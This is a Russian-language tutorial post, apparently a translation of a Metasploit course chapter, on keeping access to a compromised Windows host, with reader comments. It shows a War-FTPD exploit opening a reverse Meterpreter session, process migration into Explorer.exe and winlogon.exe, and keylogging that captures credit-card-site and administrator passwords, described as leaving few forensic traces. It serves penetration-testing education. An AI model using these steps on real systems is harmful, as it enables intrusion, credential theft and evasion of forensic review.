Сохранение доступа.
После успешной компрометации системы, пока доступ открыт, хорошей идеей будет иметь запасной вариант и убедиться, что вы не потеряете этот доступ, и в преть можете спокойно исследовать как этот хост, так и подстеть к которому он принадлежит. Это выход из ситуации когда эксплуатация уязвимости носит одноразовый характер, в таких случаях вы не сможете получить доступ к целевому хосту до его перезагрузки.
Как только вы получили доступ к одной системе, в конечном счете, вы можете получить доступ к системам, которые находятся в той же подсети. Плавно передвигаясь от одной системы к другой, получать информацию о пользователях и их деятельности путем отслеживания нажатий клавиш этими пользователями, а затем выдать себя за реального пользователя путем предоставления захваченных аутентификационных данных. Существует несколько методик о которых мы расскажем далее.
Перехват нажатия клавиш.
После того, как вы успешно «проэксплуатировали» систему, существует два различных подхода дальнейших действий, вы можете уничтожить систему или получить больше информации, используя вариант более медленный и тщательный.
Медленный и тщательный вариант обычно приводит к значительному объему информации, но при должном терпении и дисциплине с вашей стороны. Одним из инструментов, который можно использовать при медленном и тщательном сборе информации — скрипт регистрации нажатия клавиш в Meterpreter. Этот инструмент очень хорош в работе и позволяет перехватывать нажатия клавиш в системы без записи перехваченной информации на диск, оставляя минимум следов в системе для возможного дальнейшего анализа компьютерной экспертизой. Инструмент идеально подходит для получения паролей учетных записей пользователей, и всякой другой ценной информации.
Давайте взглянем на него в действии. Во-первых проэксплуатируем систему в нормальном режиме.
msf exploit(warftpd_165_user) > exploit [*] Handler binding to LHOST 0.0.0.0 [*] Started reverse handler [*] Connecting to FTP server 172.16.104.145:21... [*] Connected to target FTP server. [*] Trying target Windows 2000 SP0-SP4 English... [*] Transmitting intermediate stager for over-sized stage...(191 bytes) [*] Sending stage (2650 bytes) [*] Sleeping before handling stage... [*] Uploading DLL (75787 bytes)... [*] Upload completed. [*] Meterpreter session 4 opened (172.16.104.130:4444 -> 172.16.104.145:1246) meterpreter >
Затем произведем миграцию с процесса Meterpreter на Explorer.exe, чтобы не беспокоится о потери соединения путем сброса и закрытия нашей сессии експлуатируемым процессом.
meterpreter > ps Process list ============ PID Name Path --- ---- ---- 140 smss.exe \SystemRoot\System32\smss.exe 188 winlogon.exe ??\C:\WINNT\system32\winlogon.exe 216 services.exe C:\WINNT\system32\services.exe 228 lsass.exe C:\WINNT\system32\lsass.exe 380 svchost.exe C:\WINNT\system32\svchost.exe 408 spoolsv.exe C:\WINNT\system32\spoolsv.exe 444 svchost.exe C:\WINNT\System32\svchost.exe 480 regsvc.exe C:\WINNT\system32\regsvc.exe 500 MSTask.exe C:\WINNT\system32\MSTask.exe 528 VMwareService.exe C:\Program Files\VMwareVMware Tools\VMwareService.exe 588 WinMgmt.exe C:\WINNT\System32\WBEMWinMgmt.exe 664 notepad.exe C:\WINNT\System32\notepad.exe 724 cmd.exe C:\WINNT\System32\cmd.exe 768 Explorer.exe C:\WINNT\Explorer.exe 800 war-ftpd.exe C:\Program Files\War-ftpd\war-ftpd.exe 888 VMwareTray.exe C:\Program Files\VMware\VMware Tools\VMwareTray.exe 896 VMwareUser.exe C:\Program Files\VMware\VMware Tools\VMwareUser.exe 940 firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe 972 TPAutoConnSvc.exe C:\Program Files\VMware\VMware Tools\TPAutoConnSvc.exe 1088 TPAutoConnect.exe C:\Program Files\VMware\VMware Tools\TPAutoConnect.exe meterpreter > migrate 768 [*] Migrating to 768... [*] Migration completed successfully. meterpreter > getpid Current pid: 768
Финальным шагом мы запускаем кейлоггер, подождав немного, вы увидите в выводе информацию нажатых клавиш.
meterpreter > keyscan_start Starting the keystroke sniffer... meterpreter > keyscan_dump Dumping captured keystrokes... tgoogle.cm my credit amex myusernamthi amexpasswordpassword
Все очень просто! Обратите внимание, как отображаются клавиши control и backspace.
В качестве дополнения, если вы хотите собрать системную информацию учетных данных на компьютере, нужно осуществить миграцию в процесс Winlogon. Это позволит захватить полномочия всех пользователей, входящих в систему.
meterpreter > ps Process list ================= PID Name Path --- ---- ---- 401 winlogon.exe C:\WINNT\system32\winlogon.exe meterpreter > migrate 401 [*] Migrating to 401... [*] Migration completed successfully. meterpreter > keyscan_start Starting the keystroke sniffer... **** A few minutes later after an admin logs in **** meterpreter > keyscan_dump Dumping captured keystrokes... Administrator ohnoes1vebeenh4x0red!
Вот статья с сайта по тематике похожего на ваш, но подача материала не ахти.
Там указан и источник статьи. Возможно ли с точки зрения последнего Bucktruck4 переработать статью и выложить.
спасибо.
Посмотрим, хотя тема не совсем интересна, «изъезжена вдоль и поперек» :) Хотя если подготовить статью по работе с SAM файлом и хэшами средствами BackTrack, можно попробовать. Вобщем не буду загадывать.
Именно только средствами BackTrack последнего релиза.
Ударная пара Метасплоит и BackTrack и сайту цены не будет.
Замечательная статья!!! Респект Вам!!! Очень помогла постигнуть истину! Желаю Вам больше релизов и однополчан! Спасибо!
Позвольте скажу свое мнение о BackTrack…. Не согласен что он самый совершенный! Gentoo с таким оружием на борту в разыыы сильнее и стабильнее! Хотя не осуждайте Линь для каждого свой!
Спасибо вам за отзыв, но я всего лишь перевел оригинал, как смог :). Жаль, что немного не хватило времени перевести весь курс до конца, но думаю вскоре как нибудь выделю, там немного осталось.
Спасибо! Буду ждать Ваших статей! Очень грамотно переведены!